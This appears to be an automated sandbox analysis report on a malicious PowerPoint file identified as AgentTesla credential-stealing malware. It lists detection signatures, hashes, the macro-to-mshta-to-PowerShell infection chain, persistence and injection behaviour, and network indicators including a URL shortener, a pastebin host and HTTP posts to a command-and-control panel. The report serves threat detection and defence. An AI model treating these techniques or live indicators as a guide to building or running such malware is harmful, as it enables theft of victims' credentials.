Analysis Report BankSwiftCopyUSD95000.ppt

Overview

General Information

Sample Name:	BankSwiftCopyUSD95000.ppt
Analysis ID:	339086
MD5:	7f0b415d0b7a76530b2f510a910811e5
SHA1:	480594ad26c91dd9d719c80334285375540dc83e
SHA256:	8d3e1d1a1775191a33980069f500e37f22bdcd0a1ad3544ab4a9d0a651fbd019
Tags:	ppt
Most interesting Screenshot:

Detection

AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for submitted file

Sigma detected: Powershell execute code from registry

Sigma detected: Schedule script from internet via mshta

Yara detected AgentTesla

.NET source code contains very large array initializations

Connects to a URL shortener service

Connects to a pastebin service (likely for C&C)

Creates a scheduled task launching mshta.exe (likely to bypass HIPS)

Creates an autostart registry key pointing to binary in C:\Windows

Creates autostart registry keys with suspicious values (likely registry only malware)

Creates multiple autostart registry keys

Document contains an embedded VBA with base64 encoded strings

Document contains an embedded VBA with many GOTO operations indicating source code obfuscation

Document contains an embedded VBA with many randomly named variables

Document exploit detected (process start blacklist hit)

Injects a PE file into a foreign processes

Machine Learning detection for sample

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Sigma detected: MSHTA Spawning Windows Shell

Sigma detected: Microsoft Office Product Spawning Windows Shell

Uses ping.exe to check the status of other devices and networks

Uses schtasks.exe or at.exe to add and modify task schedules

Writes to foreign memory regions

Yara detected Costura Assembly Loader

Allocates a big amount of memory (probably used for heap spraying)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Contains functionality to call native functions

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Detected potential crypto function

Document contains an embedded VBA macro which executes code when the document is opened / closed

Document contains embedded VBA macros

Document misses a certain OLE stream usually present in this Microsoft Office document type

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Searches for the Microsoft Outlook file path

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Uses taskkill to terminate processes

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected Credential Stealer

Classification

Signatures

AV Detection:

Antivirus / Scanner detection for submitted sample

Source: BankSwiftCopyUSD95000.ppt

Avira: detected

Multi AV Scanner detection for submitted file

Source: BankSwiftCopyUSD95000.ppt	Virustotal: Detection: 34%			Perma Link
Source: BankSwiftCopyUSD95000.ppt	ReversingLabs: Detection: 21%

Machine Learning detection for sample

Source: BankSwiftCopyUSD95000.ppt

Joe Sandbox ML: detected

Compliance:

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown	HTTPS traffic detected: 104.18.49.20:443 -> 192.168.2.22:49174 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.18.49.20:443 -> 192.168.2.22:49183 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.18.49.20:443 -> 192.168.2.22:49184 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 172.67.219.133:443 -> 192.168.2.22:49193 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.18.49.20:443 -> 192.168.2.22:49206 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.18.49.20:443 -> 192.168.2.22:49210 version: TLS 1.0

Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49168 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49178 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49188 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49192 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49200 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49208 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49213 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49215 version: TLS 1.2

Source:	Binary string: Managament.inf.pdb source: powershell.exe, 0000000C.00000002.2287134514.0000000006951000.00000004.00000001.sdmp
Source:	Binary string: mscorrc.pdb source: powershell.exe, 0000000C.00000002.2254678756.0000000002B60000.00000002.00000001.sdmp

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE

Process created: C:\Windows\System32\PING.EXE

Jump to behavior

Allocates a big amount of memory (probably used for heap spraying)

Source: powerpnt.exe

Memory has grown: Private usage: 0MB later: 10MB

Potential document exploit detected (performs DNS queries)

Source: global traffic

DNS query: name: j.mp

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49168 -> 108.177.127.132:443

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 67.199.248.16:80

Networking:

Connects to a URL shortener service

Source: unknown

DNS query: name: j.mp

Connects to a pastebin service (likely for C&C)

Source: unknown	DNS query: name: paste.ee
Source: unknown	DNS query: name: paste.ee
Source: unknown	DNS query: name: paste.ee
Source: unknown	DNS query: name: paste.ee
Source: unknown	DNS query: name: paste.ee
Source: unknown	DNS query: name: paste.ee

Uses ping.exe to check the status of other devices and networks

Source: unknown

Process created: C:\Windows\System32\PING.EXE ping.exe

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 172.67.219.133 172.67.219.133
Source: Joe Sandbox View	IP Address: 172.67.219.133 172.67.219.133
Source: Joe Sandbox View	IP Address: 67.199.248.16 67.199.248.16
Source: Joe Sandbox View	IP Address: 67.199.248.16 67.199.248.16

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: GOOGLE-PRIVATE-CLOUDUS GOOGLE-PRIVATE-CLOUDUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: Joe Sandbox View	JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /dbgghasdnasdjasgdakgsdhv HTTP/1.1Accept: /Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: j.mpConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 368Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 368Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 368Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 368Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 368Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 368Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 368Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 368Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 368Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 368Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 368Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 368Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 368Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 368Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 368Expect: 100-continueConnection: Keep-Alive

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown	HTTPS traffic detected: 104.18.49.20:443 -> 192.168.2.22:49174 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.18.49.20:443 -> 192.168.2.22:49183 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.18.49.20:443 -> 192.168.2.22:49184 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 172.67.219.133:443 -> 192.168.2.22:49193 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.18.49.20:443 -> 192.168.2.22:49206 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.18.49.20:443 -> 192.168.2.22:49210 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 64.188.18.218
Source: unknown	TCP traffic detected without corresponding DNS query: 64.188.18.218
Source: unknown	TCP traffic detected without corresponding DNS query: 64.188.18.218
Source: unknown	TCP traffic detected without corresponding DNS query: 64.188.18.218
Source: unknown	TCP traffic detected without corresponding DNS query: 64.188.18.218
Source: unknown	TCP traffic detected without corresponding DNS query: 64.188.18.218
Source: unknown	TCP traffic detected without corresponding DNS query: 64.188.18.218
Source: unknown	TCP traffic detected without corresponding DNS query: 64.188.18.218
Source: unknown	TCP traffic detected without corresponding DNS query: 64.188.18.218
Source: unknown	TCP traffic detected without corresponding DNS query: 64.188.18.218
Source: unknown	TCP traffic detected without corresponding DNS query: 64.188.18.218
Source: unknown	TCP traffic detected without corresponding DNS query: 64.188.18.218
Source: unknown	TCP traffic detected without corresponding DNS query: 64.188.18.218
Source: unknown	TCP traffic detected without corresponding DNS query: 64.188.18.218
Source: unknown	TCP traffic detected without corresponding DNS query: 64.188.18.218
Source: unknown	TCP traffic detected without corresponding DNS query: 64.188.18.218
Source: unknown	TCP traffic detected without corresponding DNS query: 64.188.18.218
Source: unknown	TCP traffic detected without corresponding DNS query: 64.188.18.218
Source: unknown	TCP traffic detected without corresponding DNS query: 64.188.18.218
Source: unknown	TCP traffic detected without corresponding DNS query: 64.188.18.218
Source: unknown	TCP traffic detected without corresponding DNS query: 64.188.18.218
Source: unknown	TCP traffic detected without corresponding DNS query: 64.188.18.218
Source: unknown	TCP traffic detected without corresponding DNS query: 64.188.18.218
Source: unknown	TCP traffic detected without corresponding DNS query: 64.188.18.218
Source: unknown	TCP traffic detected without corresponding DNS query: 64.188.18.218
Source: unknown	TCP traffic detected without corresponding DNS query: 64.188.18.218
Source: unknown	TCP traffic detected without corresponding DNS query: 64.188.18.218
Source: unknown	TCP traffic detected without corresponding DNS query: 64.188.18.218
Source: unknown	TCP traffic detected without corresponding DNS query: 64.188.18.218
Source: unknown	TCP traffic detected without corresponding DNS query: 64.188.18.218
Source: unknown	TCP traffic detected without corresponding DNS query: 64.188.18.218
Source: unknown	TCP traffic detected without corresponding DNS query: 64.188.18.218
Source: unknown	TCP traffic detected without corresponding DNS query: 64.188.18.218
Source: unknown	TCP traffic detected without corresponding DNS query: 64.188.18.218
Source: unknown	TCP traffic detected without corresponding DNS query: 64.188.18.218
Source: unknown	TCP traffic detected without corresponding DNS query: 64.188.18.218
Source: unknown	TCP traffic detected without corresponding DNS query: 64.188.18.218
Source: unknown	TCP traffic detected without corresponding DNS query: 64.188.18.218
Source: unknown	TCP traffic detected without corresponding DNS query: 64.188.18.218
Source: unknown	TCP traffic detected without corresponding DNS query: 64.188.18.218
Source: unknown	TCP traffic detected without corresponding DNS query: 64.188.18.218
Source: unknown	TCP traffic detected without corresponding DNS query: 64.188.18.218
Source: unknown	TCP traffic detected without corresponding DNS query: 64.188.18.218
Source: unknown	TCP traffic detected without corresponding DNS query: 64.188.18.218
Source: unknown	TCP traffic detected without corresponding DNS query: 64.188.18.218
Source: unknown	TCP traffic detected without corresponding DNS query: 64.188.18.218
Source: unknown	TCP traffic detected without corresponding DNS query: 64.188.18.218
Source: unknown	TCP traffic detected without corresponding DNS query: 64.188.18.218
Source: unknown	TCP traffic detected without corresponding DNS query: 64.188.18.218
Source: unknown	TCP traffic detected without corresponding DNS query: 64.188.18.218

Source: C:\Windows\System32\mshta.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ

Jump to behavior

Source: global traffic

HTTP traffic detected: GET /dbgghasdnasdjasgdakgsdhv HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: j.mpConnection: Keep-Alive

Source: mshta.exe, 00000006.00000002.2268752181.00000000003DE000.00000004.00000020.sdmp	String found in binary or memory: /moc.nideknil.wwwwww.linkedin.comt\ equals www.linkedin.com (Linkedin)
Source: mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmp	String found in binary or memory: Content-Security-Policy: script-src 'self' .google.com .google-analytics.com 'unsafe-inline' 'unsafe-eval' .gstatic.com .googlesyndication.com .blogger.com .googleapis.com uds.googleusercontent.com https://s.ytimg.com https://i18n-cloud.appspot.com https://www.youtube.com www-onepick-opensocial.googleusercontent.com www-bloggervideo-opensocial.googleusercontent.com www-blogger-opensocial.googleusercontent.com https://www.blogblog.com; report-uri /cspreport equals www.youtube.com (Youtube)
Source: mshta.exe, 00000006.00000002.2277240561.0000000003D50000.00000002.00000001.sdmp, powershell.exe, 0000000C.00000002.2255231499.0000000002C00000.00000002.00000001.sdmp	String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: mshta.exe, 00000006.00000002.2268752181.00000000003DE000.00000004.00000020.sdmp	String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmp	String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: unknown

DNS traffic detected: queries for: j.mp

Source: unknown

HTTP traffic detected: POST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 368Expect: 100-continueConnection: Keep-Alive

Source: mshta.exe, 00000006.00000002.2308801585.0000000005947000.00000004.00000001.sdmp	String found in binary or memory: Https://www.blogger.com/share-post.g?blogID=9116518222795791100&pageID=8792113328696570758&target=pi
Source: powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: mshta.exe, 00000006.00000003.2221379994.0000000003B73000.00000004.00000001.sdmp	String found in binary or memory: http://crl.pki.goog/GTS1O1core.crl0
Source: mshta.exe, 00000006.00000003.2221379994.0000000003B73000.00000004.00000001.sdmp	String found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crl0?
Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
Source: powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
Source: powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0L
Source: mshta.exe, 00000006.00000003.2244847739.00000000080E4000.00000004.00000001.sdmp	String found in binary or memory: http://csi.gstatic.com/csi
Source: mshta.exe, 00000006.00000002.2277240561.0000000003D50000.00000002.00000001.sdmp, powershell.exe, 0000000C.00000002.2255231499.0000000002C00000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com
Source: mshta.exe, 00000006.00000002.2277240561.0000000003D50000.00000002.00000001.sdmp, powershell.exe, 0000000C.00000002.2255231499.0000000002C00000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com/
Source: mshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmp	String found in binary or memory: http://j.mp/
Source: mshta.exe, 00000006.00000003.2264502398.00000000003F5000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2269237459.0000000000430000.00000004.00000020.sdmp	String found in binary or memory: http://j.mp/dbgghasdnasdjasgdakgsdhv
Source: mshta.exe, 00000006.00000002.2279301165.0000000003F37000.00000002.00000001.sdmp, powershell.exe, 0000000C.00000002.2257266927.0000000002DE7000.00000002.00000001.sdmp, mshta.exe, 00000011.00000002.2226296090.00000000037E7000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: mshta.exe, 00000006.00000002.2279301165.0000000003F37000.00000002.00000001.sdmp, powershell.exe, 0000000C.00000002.2257266927.0000000002DE7000.00000002.00000001.sdmp, mshta.exe, 00000011.00000002.2226296090.00000000037E7000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0:
Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: mshta.exe, 00000006.00000003.2246403287.00000000058DC000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.pki.goog/gs
Source: mshta.exe, 00000006.00000003.2221379994.0000000003B73000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.pki.goog/gsr202
Source: mshta.exe, 00000006.00000003.2221379994.0000000003B73000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.pki.goog/gts1o1core0
Source: mshta.exe, 00000006.00000003.2246403287.00000000058DC000.00000004.00000001.sdmp	String found in binary or memory: http://pki.goog/g
Source: mshta.exe, 00000006.00000002.2307607404.0000000005853000.00000004.00000001.sdmp	String found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0
Source: mshta.exe, 00000006.00000003.2250091244.0000000003B4B000.00000004.00000001.sdmp	String found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt05
Source: mshta.exe, 00000006.00000003.2221379994.0000000003B73000.00000004.00000001.sdmp	String found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0C
Source: mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp	String found in binary or memory: http://schema.org/BlogPosting
Source: mshta.exe, 00000006.00000002.2280946216.0000000004230000.00000002.00000001.sdmp, powershell.exe, 0000000C.00000002.2249204389.0000000002220000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: mshta.exe, 00000006.00000002.2279301165.0000000003F37000.00000002.00000001.sdmp, powershell.exe, 0000000C.00000002.2257266927.0000000002DE7000.00000002.00000001.sdmp, mshta.exe, 00000011.00000002.2226296090.00000000037E7000.00000002.00000001.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: mshta.exe, 00000006.00000002.2279301165.0000000003F37000.00000002.00000001.sdmp, powershell.exe, 0000000C.00000002.2257266927.0000000002DE7000.00000002.00000001.sdmp, mshta.exe, 00000011.00000002.2226296090.00000000037E7000.00000002.00000001.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: mshta.exe, 00000006.00000002.2280946216.0000000004230000.00000002.00000001.sdmp, powershell.exe, 0000000C.00000002.2249204389.0000000002220000.00000002.00000001.sdmp, mshta.exe, 00000011.00000002.2231119435.0000000004080000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: mshta.exe, 00000006.00000003.2242124105.00000000075EA000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2243633505.0000000008621000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2244847739.00000000080E4000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: mshta.exe, 00000006.00000003.2249695813.000000000592E000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2308627180.000000000592E000.00000004.00000001.sdmp	String found in binary or memory: http://www.blogger.com/go/cookiechoices
Source: mshta.exe, 00000006.00000003.2242124105.00000000075EA000.00000004.00000001.sdmp	String found in binary or memory: http://www.cookiechoices.org/
Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: mshta.exe, 00000006.00000002.2277240561.0000000003D50000.00000002.00000001.sdmp, powershell.exe, 0000000C.00000002.2255231499.0000000002C00000.00000002.00000001.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: mshta.exe, 00000006.00000002.2279301165.0000000003F37000.00000002.00000001.sdmp, powershell.exe, 0000000C.00000002.2257266927.0000000002DE7000.00000002.00000001.sdmp, mshta.exe, 00000011.00000002.2226296090.00000000037E7000.00000002.00000001.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
